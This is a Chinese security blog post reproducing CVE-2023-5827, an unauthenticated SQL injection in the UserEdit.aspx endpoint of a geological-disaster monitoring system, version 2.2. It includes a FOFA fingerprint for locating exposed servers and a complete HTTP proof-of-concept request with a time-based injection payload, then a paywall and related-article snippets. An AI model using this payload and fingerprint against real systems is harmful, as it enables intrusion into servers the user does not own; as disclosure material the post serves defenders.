华测监测预警系统2.2 UserEdit.aspx SQL注入致RCE漏洞复现(CVE-2023-5827)

已于 2024-06-20 10:05:24 修改
阅读量517 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-06-20 10:04:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/139823621
版权

0x01 产品简介

华测监测预警系统2.2是一套针对地质灾害监测预警的科学、完善平台,实现了地质灾害防治管理的科学化、信息化、标准化和可视化。该系统由上海华测导航技术有限公司开发,主要服务于山体滑坡、地裂缝等地质灾害的自动化预警。

0x02 漏洞概述

华测监测预警系统2.2 UserEdit.aspx 接口处存在SQL注入漏洞,未经身份验证的远程攻击者可利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。

0x03 复现环境

FOFA:icon_hash="-628229493"

0x04 漏洞复现

PoC

POST /Web/SysManage/UserEdit.aspx?&ID=1';WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
漏洞监测预警系统2.2 UserEdit.aspx SQL注入
weixin_54799594的博客
07-12 1208
漏洞过程记录
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 768
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
某站点监测预警系统2.2版本-sql注入漏洞
qq_35075142的博客
03-16 565
作为国内唯一一家集北斗卫星应用产品研发、生产和销售为一体的单位,监测预警系统能够提供准确的监测结果和及时的预警信息,帮助用户避免设备故障、事故以及其他不良事件的发生,降低潜在风险和损失。本人严格遵守我国法律法规,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请诸君严格遵守法律要求.本文简要讲述简单的渗透试以及相关sql注入漏洞试,仅用作学习研究。尝试通过shell写入试命令whoami,ipconfig,如下图3所示。(1)漏洞影响:监测预警系统2.2。
监测预警系统 2.2 存在任意文件读取漏洞
holyxp的博客
10-10 1077
监测预警系统是一套科学完善的地质灾害监测预警平台,实了地质灾害防治管理的科学化、信息化、标准化和可视化。
监测预警系统 2.2---任意文件读取漏洞
hackzkaq的博客
10-19 339
通过hackerbar 可以修改POST传参,或者利用BP构造请求包。最后直接用hunter找到有备案信息的公司,直接提交 盒子成功!个人推荐hunter可以看到icp备案公司直接提交盒子就行了。filepath是文件路径,这里访问后会直接下载文件到本地。这里的filename随便传参,只是一个文件名字。文件里包含了数据库的账号密码。这里手动的,目录是/
漏洞--监测预警系统2.2任意文件读取
qq_53003652的博客
10-15 270
监测集成事业部充分利用在地质灾害监测方面的技术积累,建立了一套科学完善的地质灾害监测预警平台,实了地质灾害防治管理的科学化、信息化、标准化和可视化。该产品2.2版本FileDownLoad.ashx存在任意文件读取漏洞。此漏洞来自掌控安全学院。监测预警系统2.2。
漏洞监测预警系统2.2 UserEdit.aspx SQL注入(CVE-2023-5827)
siu~
06-20 251
监测预警系统2.2 UserEdit.aspx 接口处存在SQL注入漏洞,未经身份验证的远程攻击者可利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修
自动化监测方案样本.docx
12-17
自动化监测方案样本是一份详细的自动化监测系统设计方案,主要介绍导航技术股份有限公司的自动化监测系统的设计理念、技术优点和应用案例。 1.1 公司简介 导航技术股份有限公司是一家专业的自动化监测...
地下水监测系统方案.doc
09-25
地下水监测系统方案.doc
广西钟马高速某高边坡自动化监测预警与变形分析.pdf
09-17
这对于预防因高边坡失稳引发的交通事故具有重要意义,也体了自动化监测系统在高速公路建设与维护中的重要地位。 总的来说,广西钟马高速的这一案例展示了如何利用先进的自动化技术来应对地质灾害带来的挑战,为...
地下水监测系统.doc
10-10
地下水监测系统】 一、概况 地下水监测系统是针对地下水环境监测而设计的一套代化技术方案,旨在实对地下水位、水质等关键参数的实时、自动化监测。在1.1流域简介中,我们可以了解到该系统适用于...
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 555
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对杂安全环境的应对能力,实持续的安全保护和合规运营。
防洪墙的安全内容检+http请求头
代码其实很简单
07-17 589
--1、深度检技术(DPI和DPF是所有内容检都必须要用到的技术);DPI--深度包检,针对完整的数据包,进行内容的识别和检---2、DFI ---深度流检---看名字都知道肯定是对数据流进行检的技术;--2、IPS ---入侵防御--3、IDS---入侵检,AV(反病毒) http请求头,http状态码
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 812
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持状。
全文翻译 | OWASP《LLM安全与治理检查清单》
lurenjia404的博客
07-17 820
本文是OWASP(开放式网络应用安全项目)发布的《LLM AI安全与治理清单》(以下简称“清单”),旨在为使用大型语言模型(LLM)的组织提供安全与治理方面的指导。清单强调了负责任和可信的人工智能(AI)的重要性,并指出AI技术,尤其是LLM,在创新、效率和商业成功方面具有巨大潜力,同时也带来了明显的挑战。文中讨论了LLM面临的挑战,包括控制和数据平面的不可分割性、非确定性设计、语义搜索的使用等,并强调了LLM增加的攻击面和相关风险。
园区道路车辆智能管控视频解决方案,打造安全畅通的园区交通环境
TSINGSEE青犀视频官方技术博客
07-16 842
AI智能分析网关V4消防通道占用算法基于人工智能视觉分析技术,通过摄像头实时监测识别是否有机动车违规停放在消防车通道上,并及时提醒管理人员进行处理。
防火墙--内容安全
最新发布
banliyaoguai的博客
07-20 370
内容安全是指对互联网上的内容进行监测、筛选和管理,以确保用户在浏览、使用互联网内容时的安全和合法性。各个厂商在进行内容安全的检、分析和处理的过程被称为引擎。下面以为IAE引擎来对内容安全进行学习ID:区分不同的签名对象:服务器,客户端。一般我们将发起连接的设备角色认定为客户端,响应连接并提供服务的角色认定为服务器。严重性:该行为一旦爆发之后,对我们网络系统的影响程度的评级协议/应用程序:这种攻击所承载的协议或者应用。
教育在线商城接口文档下载
09-03
很抱歉,根据我所提供的引用内容,并没有提到教育在线商城接口文档下载的信息。因此,我无法为您提供具体关于教育在线商城接口文档下载的答案。如果您需要获取教育在线商城接口文档下载,建议您直接联系教育在线商城的相关负责人或者技术支持团队,他们将能够为您提供相关的帮助和指导。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [全栈Python自动化试学习资料【付费资源、看到即赚到,】](https://blog.csdn.net/Liuyanan990830/article/details/127078225)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [软件试面试02:接口试、接口关联、Jmeter](https://blog.csdn.net/pizi0103/article/details/129199735)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值